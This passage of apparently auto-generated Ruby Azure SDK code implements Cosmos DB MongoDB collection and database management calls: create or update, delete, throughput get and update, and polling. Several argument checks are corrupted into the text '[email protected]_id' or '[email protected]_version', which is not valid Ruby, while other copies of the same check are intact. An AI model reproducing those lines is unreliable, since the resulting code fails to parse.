result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::MongoDBCollectionGetResults.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Create or update an Azure Cosmos DB MongoDB Collection
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param create_update_mongo_dbcollection_parameters
# [MongoDBCollectionCreateUpdateParameters] The parameters to provide for the
# current MongoDB Collection.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MongoDBCollectionGetResults] operation results.
#
def create_update_mongo_dbcollection(resource_group_name, account_name, database_name, collection_name, create_update_mongo_dbcollection_parameters, custom_headers:nil)
  # Wait for the long-running operation and surface only its body.
  operation_response = create_update_mongo_dbcollection_async(resource_group_name, account_name, database_name, collection_name, create_update_mongo_dbcollection_parameters, custom_headers:custom_headers).value!
  operation_response&.body
end
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param create_update_mongo_dbcollection_parameters
# [MongoDBCollectionCreateUpdateParameters] The parameters to provide for the
# current MongoDB Collection.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] promise which provides async access to http
# response.
#
def create_update_mongo_dbcollection_async(resource_group_name, account_name, database_name, collection_name, create_update_mongo_dbcollection_parameters, custom_headers:nil)
  # Kick off the initial PUT request for the long-running operation.
  initial_promise = begin_create_update_mongo_dbcollection_async(resource_group_name, account_name, database_name, collection_name, create_update_mongo_dbcollection_parameters, custom_headers:custom_headers)
  initial_promise.then do |response|
    # Converts the terminal payload into a MongoDBCollectionGetResults model.
    body_deserializer = lambda do |parsed_response|
      mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::MongoDBCollectionGetResults.mapper()
      @client.deserialize(mapper, parsed_response)
    end
    # Poll the operation to a terminal state before resolving the promise.
    @client.get_long_running_operation_result(response, body_deserializer)
  end
end
#
# Deletes an existing Azure Cosmos DB MongoDB Collection.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
def delete_mongo_dbcollection(resource_group_name, account_name, database_name, collection_name, custom_headers:nil)
  # Wait for the long-running delete to finish; the operation yields no body.
  delete_mongo_dbcollection_async(resource_group_name, account_name, database_name, collection_name, custom_headers:custom_headers).value!
  nil
end
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] promise which provides async access to http
# response.
#
def delete_mongo_dbcollection_async(resource_group_name, account_name, database_name, collection_name, custom_headers:nil)
  # Kick off the initial DELETE request for the long-running operation.
  initial_promise = begin_delete_mongo_dbcollection_async(resource_group_name, account_name, database_name, collection_name, custom_headers:custom_headers)
  initial_promise.then do |response|
    # DELETE produces no body, so the deserializer is a no-op.
    noop_deserializer = lambda do |_parsed_response|
    end
    # Poll the operation to a terminal state before resolving the promise.
    @client.get_long_running_operation_result(response, noop_deserializer)
  end
end
#
# Gets the RUs per second of the MongoDB collection under an existing Azure
# Cosmos DB database account with the provided name.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [ThroughputSettingsGetResults] operation results.
#
def get_mongo_dbcollection_throughput(resource_group_name, account_name, database_name, collection_name, custom_headers:nil)
  # Resolve the async call and hand back just the deserialized body.
  operation_response = get_mongo_dbcollection_throughput_async(resource_group_name, account_name, database_name, collection_name, custom_headers:custom_headers).value!
  operation_response&.body
end
#
# Gets the RUs per second of the MongoDB collection under an existing Azure
# Cosmos DB database account with the provided name.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def get_mongo_dbcollection_throughput_with_http_info(resource_group_name, account_name, database_name, collection_name, custom_headers:nil)
  # Resolve the async call but keep the full operation-response wrapper.
  promise = get_mongo_dbcollection_throughput_async(resource_group_name, account_name, database_name, collection_name, custom_headers:custom_headers)
  promise.value!
end
#
# Gets the RUs per second of the MongoDB collection under an existing Azure
# Cosmos DB database account with the provided name.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param custom_headers [Hash{String => String}] A hash of custom headers
# that will be added to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def get_mongo_dbcollection_throughput_async(resource_group_name, account_name, database_name, collection_name, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, "'@client.subscription_id' should satisfy the constraint - 'MinLength': '1'" if [email protected]_id.nil? && @client.subscription_id.length < 1
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MaxLength': '90'" if !resource_group_name.nil? && resource_group_name.length > 90
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MinLength': '1'" if !resource_group_name.nil? && resource_group_name.length < 1
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'Pattern': '^[-\w\._\(\)]+$'" if !resource_group_name.nil? && resource_group_name.match(Regexp.new('^^[-\w\._\(\)]+$$')).nil?
fail ArgumentError, 'account_name is nil' if account_name.nil?
fail ArgumentError, "'account_name' should satisfy the constraint - 'MaxLength': '50'" if !account_name.nil? && account_name.length > 50
fail ArgumentError, "'account_name' should satisfy the constraint - 'MinLength': '3'" if !account_name.nil? && account_name.length < 3
fail ArgumentError, "'account_name' should satisfy the constraint - 'Pattern': '^[a-z0-9]+(-[a-z0-9]+)*'" if !account_name.nil? && account_name.match(Regexp.new('^^[a-z0-9]+(-[a-z0-9]+)*$')).nil?
fail ArgumentError, 'database_name is nil' if database_name.nil?
fail ArgumentError, 'collection_name is nil' if collection_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, "'@client.api_version' should satisfy the constraint - 'MinLength': '1'" if [email protected]_version.nil? && @client.api_version.length < 1
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}/collections/{collectionName}/throughputSettings/default'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'accountName' => account_name,'databaseName' => database_name,'collectionName' => collection_name},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::ThroughputSettingsGetResults.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Update the RUs per second of an Azure Cosmos DB MongoDB collection
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param update_throughput_parameters [ThroughputSettingsUpdateParameters] The
# RUs per second of the parameters to provide for the current MongoDB
# collection.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [ThroughputSettingsGetResults] operation results.
#
def update_mongo_dbcollection_throughput(resource_group_name, account_name, database_name, collection_name, update_throughput_parameters, custom_headers:nil)
  # Wait for the long-running operation and surface only its body.
  operation_response = update_mongo_dbcollection_throughput_async(resource_group_name, account_name, database_name, collection_name, update_throughput_parameters, custom_headers:custom_headers).value!
  operation_response&.body
end
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param update_throughput_parameters [ThroughputSettingsUpdateParameters] The
# RUs per second of the parameters to provide for the current MongoDB
# collection.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] promise which provides async access to http
# response.
#
def update_mongo_dbcollection_throughput_async(resource_group_name, account_name, database_name, collection_name, update_throughput_parameters, custom_headers:nil)
  # Kick off the initial request for the long-running throughput update.
  initial_promise = begin_update_mongo_dbcollection_throughput_async(resource_group_name, account_name, database_name, collection_name, update_throughput_parameters, custom_headers:custom_headers)
  initial_promise.then do |response|
    # Converts the terminal payload into a ThroughputSettingsGetResults model.
    body_deserializer = lambda do |parsed_response|
      mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::ThroughputSettingsGetResults.mapper()
      @client.deserialize(mapper, parsed_response)
    end
    # Poll the operation to a terminal state before resolving the promise.
    @client.get_long_running_operation_result(response, body_deserializer)
  end
end
#
# Create or updates Azure Cosmos DB MongoDB database
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param create_update_mongo_dbdatabase_parameters
# [MongoDBDatabaseCreateUpdateParameters] The parameters to provide for the
# current MongoDB database.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MongoDBDatabaseGetResults] operation results.
#
def begin_create_update_mongo_dbdatabase(resource_group_name, account_name, database_name, create_update_mongo_dbdatabase_parameters, custom_headers:nil)
  # Resolve the async call and hand back just the deserialized body.
  operation_response = begin_create_update_mongo_dbdatabase_async(resource_group_name, account_name, database_name, create_update_mongo_dbdatabase_parameters, custom_headers:custom_headers).value!
  operation_response&.body
end
#
# Create or updates Azure Cosmos DB MongoDB database
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param create_update_mongo_dbdatabase_parameters
# [MongoDBDatabaseCreateUpdateParameters] The parameters to provide for the
# current MongoDB database.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def begin_create_update_mongo_dbdatabase_with_http_info(resource_group_name, account_name, database_name, create_update_mongo_dbdatabase_parameters, custom_headers:nil)
  # Resolve the async call but keep the full operation-response wrapper.
  promise = begin_create_update_mongo_dbdatabase_async(resource_group_name, account_name, database_name, create_update_mongo_dbdatabase_parameters, custom_headers:custom_headers)
  promise.value!
end
#
# Create or updates Azure Cosmos DB MongoDB database
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param create_update_mongo_dbdatabase_parameters
# [MongoDBDatabaseCreateUpdateParameters] The parameters to provide for the
# current MongoDB database.
# @param custom_headers [Hash{String => String}] A hash of custom headers
# that will be added to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def begin_create_update_mongo_dbdatabase_async(resource_group_name, account_name, database_name, create_update_mongo_dbdatabase_parameters, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, "'@client.subscription_id' should satisfy the constraint - 'MinLength': '1'" if [email protected]_id.nil? && @client.subscription_id.length < 1
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MaxLength': '90'" if !resource_group_name.nil? && resource_group_name.length > 90
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MinLength': '1'" if !resource_group_name.nil? && resource_group_name.length < 1
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'Pattern': '^[-\w\._\(\)]+$'" if !resource_group_name.nil? && resource_group_name.match(Regexp.new('^^[-\w\._\(\)]+$$')).nil?
fail ArgumentError, 'account_name is nil' if account_name.nil?
fail ArgumentError, "'account_name' should satisfy the constraint - 'MaxLength': '50'" if !account_name.nil? && account_name.length > 50
fail ArgumentError, "'account_name' should satisfy the constraint - 'MinLength': '3'" if !account_name.nil? && account_name.length < 3
fail ArgumentError, "'account_name' should satisfy the constraint - 'Pattern': '^[a-z0-9]+(-[a-z0-9]+)*'" if !account_name.nil? && account_name.match(Regexp.new('^^[a-z0-9]+(-[a-z0-9]+)*$')).nil?
fail ArgumentError, 'database_name is nil' if database_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, "'@client.api_version' should satisfy the constraint - 'MinLength': '1'" if [email protected]_version.nil? && @client.api_version.length < 1
fail ArgumentError, 'create_update_mongo_dbdatabase_parameters is nil' if create_update_mongo_dbdatabase_parameters.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
# Serialize Request
request_mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::MongoDBDatabaseCreateUpdateParameters.mapper()
request_content = @client.serialize(request_mapper, create_update_mongo_dbdatabase_parameters)
request_content = request_content != nil ? JSON.generate(request_content, quirks_mode: true) : nil
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'accountName' => account_name,'databaseName' => database_name},
query_params: {'api-version' => @client.api_version},
body: request_content,
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:put, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 202 || status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::MongoDBDatabaseGetResults.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Deletes an existing Azure Cosmos DB MongoDB database.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
#
def begin_delete_mongo_dbdatabase(resource_group_name, account_name, database_name, custom_headers:nil)
  # Resolve the async delete; this operation yields no body.
  begin_delete_mongo_dbdatabase_async(resource_group_name, account_name, database_name, custom_headers:custom_headers).value!
  nil
end
#
# Deletes an existing Azure Cosmos DB MongoDB database.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def begin_delete_mongo_dbdatabase_with_http_info(resource_group_name, account_name, database_name, custom_headers:nil)
  # Resolve the async call but keep the full operation-response wrapper.
  promise = begin_delete_mongo_dbdatabase_async(resource_group_name, account_name, database_name, custom_headers:custom_headers)
  promise.value!
end
#
# Deletes an existing Azure Cosmos DB MongoDB database.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param custom_headers [Hash{String => String}] A hash of custom headers
# that will be added to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def begin_delete_mongo_dbdatabase_async(resource_group_name, account_name, database_name, custom_headers:nil)
  # Fail fast on missing or constraint-violating client configuration and
  # parameters before any network activity.
  fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
  fail ArgumentError, "'@client.subscription_id' should satisfy the constraint - 'MinLength': '1'" if [email protected]_id.nil? && @client.subscription_id.length < 1
  fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
  fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MaxLength': '90'" if !resource_group_name.nil? && resource_group_name.length > 90
  fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MinLength': '1'" if !resource_group_name.nil? && resource_group_name.length < 1
  fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'Pattern': '^[-\w\._\(\)]+$'" if !resource_group_name.nil? && resource_group_name.match(Regexp.new('^^[-\w\._\(\)]+$$')).nil?
  fail ArgumentError, 'account_name is nil' if account_name.nil?
  fail ArgumentError, "'account_name' should satisfy the constraint - 'MaxLength': '50'" if !account_name.nil? && account_name.length > 50
  fail ArgumentError, "'account_name' should satisfy the constraint - 'MinLength': '3'" if !account_name.nil? && account_name.length < 3
  fail ArgumentError, "'account_name' should satisfy the constraint - 'Pattern': '^[a-z0-9]+(-[a-z0-9]+)*'" if !account_name.nil? && account_name.match(Regexp.new('^^[a-z0-9]+(-[a-z0-9]+)*$')).nil?
  fail ArgumentError, 'database_name is nil' if database_name.nil?
  fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
  fail ArgumentError, "'@client.api_version' should satisfy the constraint - 'MinLength': '1'" if [email protected]_version.nil? && @client.api_version.length < 1

  request_headers = {}
  request_headers['Content-Type'] = 'application/json; charset=utf-8'

  # Set Headers: a fresh request id per call for server-side correlation.
  request_headers['x-ms-client-request-id'] = SecureRandom.uuid
  request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
  path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}'

  request_url = @base_url || @client.base_url

  options = {
      middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
      path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'accountName' => account_name,'databaseName' => database_name},
      query_params: {'api-version' => @client.api_version},
      headers: request_headers.merge(custom_headers || {}),
      base_url: request_url
  }
  promise = @client.make_request_async(:delete, path_template, options)

  promise = promise.then do |result|
    http_response = result.response
    status_code = http_response.status
    response_content = http_response.body
    # 202 = delete accepted (still running), 204 = already gone / done;
    # any other status is surfaced as an AzureOperationError.
    unless status_code == 202 || status_code == 204
      error_model = JSON.load(response_content)
      fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
    end

    # Propagate Azure tracing identifiers onto the result object.
    # No body deserialization: this delete returns no payload.
    result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
    result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
    result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?

    result
  end

  promise.execute
end
#
# Update RUs per second of an Azure Cosmos DB MongoDB database
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param update_throughput_parameters [ThroughputSettingsUpdateParameters] The
# RUs per second of the parameters to provide for the current MongoDB database.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [ThroughputSettingsGetResults] operation results.
#
def begin_update_mongo_dbdatabase_throughput(resource_group_name, account_name, database_name, update_throughput_parameters, custom_headers:nil)
  # Resolve the async call and hand back just the deserialized body.
  operation_response = begin_update_mongo_dbdatabase_throughput_async(resource_group_name, account_name, database_name, update_throughput_parameters, custom_headers:custom_headers).value!
  operation_response&.body
end
#
# Update RUs per second of an Azure Cosmos DB MongoDB database
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param update_throughput_parameters [ThroughputSettingsUpdateParameters] The
# RUs per second of the parameters to provide for the current MongoDB database.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def begin_update_mongo_dbdatabase_throughput_with_http_info(resource_group_name, account_name, database_name, update_throughput_parameters, custom_headers:nil)
  # Same call as the plain variant, but the caller receives the full
  # AzureOperationResponse (status, headers) instead of only the body.
  promise = begin_update_mongo_dbdatabase_throughput_async(resource_group_name, account_name, database_name, update_throughput_parameters, custom_headers:custom_headers)
  promise.value!
end
#
# Update RUs per second of an Azure Cosmos DB MongoDB database
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param update_throughput_parameters [ThroughputSettingsUpdateParameters] The
# RUs per second of the parameters to provide for the current MongoDB database.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def begin_update_mongo_dbdatabase_throughput_async(resource_group_name, account_name, database_name, update_throughput_parameters, custom_headers:nil)
# Validate client configuration and every parameter against the constraints
# declared by the REST API spec; violations raise ArgumentError immediately.
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, "'@client.subscription_id' should satisfy the constraint - 'MinLength': '1'" if !@client.subscription_id.nil? && @client.subscription_id.length < 1
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MaxLength': '90'" if !resource_group_name.nil? && resource_group_name.length > 90
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MinLength': '1'" if !resource_group_name.nil? && resource_group_name.length < 1
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'Pattern': '^[-\w\._\(\)]+$'" if !resource_group_name.nil? && resource_group_name.match(Regexp.new('^^[-\w\._\(\)]+$$')).nil?
fail ArgumentError, 'account_name is nil' if account_name.nil?
fail ArgumentError, "'account_name' should satisfy the constraint - 'MaxLength': '50'" if !account_name.nil? && account_name.length > 50
fail ArgumentError, "'account_name' should satisfy the constraint - 'MinLength': '3'" if !account_name.nil? && account_name.length < 3
fail ArgumentError, "'account_name' should satisfy the constraint - 'Pattern': '^[a-z0-9]+(-[a-z0-9]+)*'" if !account_name.nil? && account_name.match(Regexp.new('^^[a-z0-9]+(-[a-z0-9]+)*$')).nil?
fail ArgumentError, 'database_name is nil' if database_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, "'@client.api_version' should satisfy the constraint - 'MinLength': '1'" if !@client.api_version.nil? && @client.api_version.length < 1
fail ArgumentError, 'update_throughput_parameters is nil' if update_throughput_parameters.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
# x-ms-client-request-id lets the service correlate this call in diagnostics.
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
# Serialize Request
request_mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::ThroughputSettingsUpdateParameters.mapper()
request_content = @client.serialize(request_mapper, update_throughput_parameters)
request_content = request_content != nil ? JSON.generate(request_content, quirks_mode: true) : nil
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}/throughputSettings/default'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'accountName' => account_name,'databaseName' => database_name},
query_params: {'api-version' => @client.api_version},
body: request_content,
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
# Issue the asynchronous PUT; the returned promise resolves to an
# AzureOperationResponse once the HTTP round-trip completes.
promise = @client.make_request_async(:put, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
# 202 = update accepted (long-running operation); 200 = completed inline.
unless status_code == 202 || status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
# Only a 200 carries a ThroughputSettingsGetResults payload; 202 has no body.
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::ThroughputSettingsGetResults.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Create or update an Azure Cosmos DB MongoDB Collection
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param create_update_mongo_dbcollection_parameters
# [MongoDBCollectionCreateUpdateParameters] The parameters to provide for the
# current MongoDB Collection.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MongoDBCollectionGetResults] operation results.
#
def begin_create_update_mongo_dbcollection(resource_group_name, account_name, database_name, collection_name, create_update_mongo_dbcollection_parameters, custom_headers:nil)
  # Synchronous wrapper: waits on the async PUT and returns the parsed
  # MongoDBCollectionGetResults body (nil when there is no response).
  result = begin_create_update_mongo_dbcollection_async(resource_group_name, account_name, database_name, collection_name, create_update_mongo_dbcollection_parameters, custom_headers:custom_headers).value!
  result.body if result
end
#
# Create or update an Azure Cosmos DB MongoDB Collection
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param create_update_mongo_dbcollection_parameters
# [MongoDBCollectionCreateUpdateParameters] The parameters to provide for the
# current MongoDB Collection.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def begin_create_update_mongo_dbcollection_with_http_info(resource_group_name, account_name, database_name, collection_name, create_update_mongo_dbcollection_parameters, custom_headers:nil)
  # Same call as the plain variant, but surfaces the full
  # AzureOperationResponse (status, headers) rather than only the body.
  promise = begin_create_update_mongo_dbcollection_async(resource_group_name, account_name, database_name, collection_name, create_update_mongo_dbcollection_parameters, custom_headers:custom_headers)
  promise.value!
end
#
# Create or update an Azure Cosmos DB MongoDB Collection
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param create_update_mongo_dbcollection_parameters
